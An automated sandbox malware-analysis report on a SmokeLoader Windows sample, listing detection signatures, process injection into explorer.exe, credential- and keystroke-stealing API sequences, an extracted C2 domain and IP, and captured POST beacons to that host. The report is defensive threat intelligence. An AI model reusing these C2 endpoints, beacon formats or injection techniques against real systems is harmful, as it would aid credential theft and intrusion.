
Windows Analysis Report 1RMZ62tUAl.exe

Overview

General Information

Sample Name: 1RMZ62tUAl.exe
Analysis ID: 524302
MD5: 8696a4269e30ddb34a7e0e84629ede03
SHA1: 125198e1f636ef118e468145d02e801a3ffe2a97
SHA256: 47ec411eab0aa15619f24caa6256ed4ca5cfc695a26f5b71830b53b07c22b05b
Tags: exe

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Checks if browser processes are running
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains functionality to compare user and computer (likely to detect sandboxes)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • 1RMZ62tUAl.exe (PID: 316 cmdline: "C:\Users\user\Desktop\1RMZ62tUAl.exe" MD5: 8696A4269E30DDB34A7E0E84629EDE03)
    • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 5732 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 2892 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 4424 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5056 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 3532 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 6052 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6908 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 4760 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6008 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 6528 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6184 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5824 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 6264 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • favdejf (PID: 6992 cmdline: C:\Users\user\AppData\Roaming\favdejf MD5: 8696A4269E30DDB34A7E0E84629EDE03)
  • cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://rsuehfidvdkfvk.top/", "http://rsuehfidvdkfvk.top/"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000018.00000002.559721619.00000000027D1000.00000040.00020000.sdmp | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |
00000016.00000002.555611191.0000000000111000.00000040.00020000.sdmp | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |
0000000A.00000002.424469148.0000000003C21000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000017.00000002.555126531.0000000000311000.00000040.00020000.sdmp | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |
00000019.00000002.555346763.0000000000E91000.00000040.00020000.sdmp | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security |

            Sigma Overview

            No Sigma rule has matched

Jbx Signature Overview

            AV Detection:

Found malware configuration
Source: 00000001.00000002.357733391.0000000002160000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://rsuehfidvdkfvk.top/", "http://rsuehfidvdkfvk.top/"]}
Multi AV Scanner detection for submitted file
Source: 1RMZ62tUAl.exe Virustotal: Detection: 46%
Multi AV Scanner detection for domain / URL
Source: iosoftware.org Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\favdejf ReversingLabs: Detection: 55%
Machine Learning detection for sample
Source: 1RMZ62tUAl.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\favdejf Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E83364 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E83171 StrRChrIW,StrRChrIW,StrRChrIW,StrRChrIW,RtlCompareMemory,CryptUnprotectData,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E83696 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E81289 StrRChrIW,lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E8122F lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E811E6 CryptBinaryToStringA,CryptBinaryToStringA,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E8213A CryptUnprotectData,RtlMoveMemory,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_0011118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_0011165C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_027D263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_027D245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_027D2404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 26_2_00331EA2 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D126D CryptBinaryToStringA,CryptBinaryToStringA,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_027D25A4 CryptBinaryToStringA,CryptBinaryToStringA,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_027D2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 31_2_027D1314 lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,
Source: 1RMZ62tUAl.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: C:\rorefeb\45\xabev\wok_kedage 44_dehawovexan.pdb source: 1RMZ62tUAl.exe
Source: Binary string: C:\rorefeb\45\xabev\wok_kedage 44_dehawovexan.pdbP source: 1RMZ62tUAl.exe
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E81EBA FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E82C81 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_001114D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_001113FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D1939 wsprintfW,FindFirstFileW,lstrcmpiW,wsprintfW,wsprintfW,wsprintfW,RtlZeroMemory,lstrcat,StrToIntA,PathMatchSpecW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D1FFD FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D217C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D1B5B GetTempPathW,lstrcatW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,wsprintfW,CreateFileW,GetFileSize,ReadFile,CloseHandle,DeleteFileW,
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

            Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 5.188.88.118 80
Source: C:\Windows\SysWOW64\explorer.exe Domain query: rsuehfidvdkfvk.top
Source: C:\Windows\explorer.exe Domain query: iosoftware.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://rsuehfidvdkfvk.top/
Source: Malware configuration extractor URLs: http://rsuehfidvdkfvk.top/
Source: Joe Sandbox View ASN Name: PINDC-ASRU PINDC-ASRU
Source: Joe Sandbox View ASN Name: HOSTKEY-USAUS HOSTKEY-USAUS
Source: global traffic HTTP traffic detected:
    POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://oidhj.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 338
    Host: rsuehfidvdkfvk.top
Source: global traffic HTTP traffic detected:
    POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://wjigjxv.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 247
    Host: rsuehfidvdkfvk.top
Source: global traffic HTTP traffic detected:
    POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://mrirybsj.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 362
    Host: rsuehfidvdkfvk.top
Source: global traffic HTTP traffic detected:
    POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://tmmykkqa.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 205
    Host: rsuehfidvdkfvk.top
Source: global traffic HTTP traffic detected:
    POST / HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://rsuehfidvdkfvk.top/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 423
    Host: rsuehfidvdkfvk.top
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 18 Nov 2021 09:44:30 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Data Raw: [chunked binary body, not reproduced here]
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 18 Nov 2021 09:44:31 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 43
    Connection: close
    Data Raw: 00 00 a5 82 9a e9 e7 a9 cb d5 14 c4 95 94 67 85 c2 1f 10 97 c9 73 e0 ad 1c 27 e0 bf bd 15 ad 68 5d fb 0c 2c 85 07 1f d1 2c 50 d3
    Data Ascii: gs'h],,P
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 18 Nov 2021 09:44:50 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 46
    Connection: close
    Data Raw: 00 00 a5 82 9a e9 e7 a9 cb d5 14 c4 95 94 67 85 c2 1f 10 97 c9 73 e0 ad 1c 27 e0 bf bd 15 ad 68 5d fb 2c 30 82 06 0a 92 71 1e 98 ef c5 4a
    Data Ascii: gs'h],0qJ
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 18 Nov 2021 09:45:16 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 406
    Connection: close
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at rsuehfidvdkfvk.top Port 80</address></body></html>
Source: explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmp, explorer.exe, 00000014.00000002.482205642.00000000011F0000.00000004.00000020.sdmp, explorer.exe, 00000015.00000002.561502388.0000000002BA8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000002.562589266.0000000002BD8000.00000004.00000020.sdmp, explorer.exe, 00000017.00000002.555930517.00000000007E0000.00000004.00000020.sdmp, explorer.exe, 00000018.00000000.500674063.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 00000019.00000000.505280148.0000000000EA0000.00000040.00020000.sdmp, explorer.exe, 0000001A.00000000.511253478.0000000000340000.00000040.00020000.sdmp, explorer.exe, 0000001B.00000002.555867484.0000000000760000.00000004.00000020.sdmp, explorer.exe, 0000001D.00000000.525714592.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.555950745.0000000001376000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000002.561863769.0000000002CC8000.00000004.00000020.sdmp String found in binary or memory: http://rsuehfidvdkfvk.top/
Source: explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmp String found in binary or memory: http://rsuehfidvdkfvk.top/:
Source: explorer.exe, 00000014.00000002.482205642.00000000011F0000.00000004.00000020.sdmp, explorer.exe, 00000015.00000002.561502388.0000000002BA8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000002.562589266.0000000002BD8000.00000004.00000020.sdmp, explorer.exe, 00000017.00000002.555930517.00000000007E0000.00000004.00000020.sdmp, explorer.exe, 00000018.00000000.500674063.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 00000019.00000000.505280148.0000000000EA0000.00000040.00020000.sdmp, explorer.exe, 00000019.00000002.555816764.0000000000EE8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.511253478.0000000000340000.00000040.00020000.sdmp, explorer.exe, 0000001B.00000002.555867484.0000000000760000.00000004.00000020.sdmp, explorer.exe, 0000001B.00000000.516205138.0000000000600000.00000040.00020000.sdmp, explorer.exe, 0000001D.00000000.525714592.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.555950745.0000000001376000.00000004.00000020.sdmp, explorer.exe, 0000001E.00000000.530597579.0000000001290000.00000040.00020000.sdmp, explorer.exe, 0000001F.00000002.561863769.0000000002CC8000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000000.535523393.00000000027E0000.00000040.00020000.sdmp String found in binary or memory: http://rsuehfidvdkfvk.top/Mozilla/5.0
Source: explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmp String found in binary or memory: http://rsuehfidvdkfvk.top/application/x-www-form-urlencodedMozilla/5.0
Source: unknown HTTP traffic detected:
    POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://oidhj.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 338
    Host: rsuehfidvdkfvk.top
Source: unknown DNS traffic detected: queries for: rsuehfidvdkfvk.top

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match File source: 0000000A.00000002.424469148.0000000003C21000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.345433901.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.357733391.0000000002160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.424450951.0000000003C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.357762865.0000000002181000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.559721619.00000000027D1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.555611191.0000000000111000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.555126531.0000000000311000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.555346763.0000000000E91000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6052, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6908, type: MEMORYSTR
Source: 1RMZ62tUAl.exe, 00000001.00000002.357794252.00000000021DA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Windows\SysWOW64\explorer.exe Code function: 29_2_027D162B GetKeyboardState,ToUnicode,

            E-Banking Fraud:

Checks if browser processes are running
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, firefox.exe
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, iexplore.exe
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, microsoftedgecp.exe
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, chrome.exe
Source: C:\Windows\SysWOW64\explorer.exe Code function: 31_2_027D226C CreateDesktopW,SetThreadDesktop,RtlZeroMemory,RtlZeroMemory,CreateProcessW,ResumeThread,
Source: 1RMZ62tUAl.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_00241351 RtlAdjustPrivilege,ExitWindowsEx,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 31_2_027D2171 StrStrIW,StrStrIW,RtlZeroMemory,ShellExecuteExW,StrStrIW,RtlAdjustPrivilege,ExitWindowsEx,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E82304
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E9B520
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02EA5AAA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E86A0C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E9AEFE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E8BE9B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02ED3FDA
Source: C:\Windows\explorer.exe Code function: 20_2_00DF1E20
Source: C:\Windows\explorer.exe Code function: 23_2_00312C18
Source: C:\Windows\explorer.exe Code function: 23_2_00312308
Source: C:\Windows\explorer.exe Code function: 25_2_00E92860
Source: C:\Windows\explorer.exe Code function: 25_2_00E92054
Source: C:\Windows\SysWOW64\explorer.exe Code function: 26_2_003331E4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 26_2_003330E8
Source: C:\Windows\explorer.exe Code function: 27_2_003F2154
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D803C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027DC392
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027DE95C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027D3D28
Source: C:\Windows\SysWOW64\explorer.exe Code function: 28_2_027DF9F4
Source: C:\Windows\explorer.exe Code function: 30_2_01282A04
Source: C:\Windows\explorer.exe Code function: 30_2_012820F4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 31_2_027D2ADD
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 027D8E70 appears 32 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 02E87B12 appears 32 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 02E883A3 appears 40 times
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Code function: 1_2_004019BC Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Code function: 1_2_004019C7 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\1RMZ62tUAl.exe Code function: 1_2_004018E6 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\favdejf Code function: 10_2_004019BC Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\favdejf Code function: 10_2_004019C7 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\favdejf Code function: 10_2_004018E6 Sleep,NtTerminateProcess,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_02E84734 RtlMoveMemory,NtUnmapViewOfSection,
Source: C:\Windows\explorer.exe Code function: 20_2_00DF38A4 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_00241016 RtlMoveMemory,NtUnmapViewOfSection,wsprintfA,RtlMoveMemory,lstrlen,RtlZeroMemory,RtlMoveMemory,RtlZeroMemory,Sleep,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_00113C89 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_00111F9A NtCreateSection,NtMapViewOfSection,
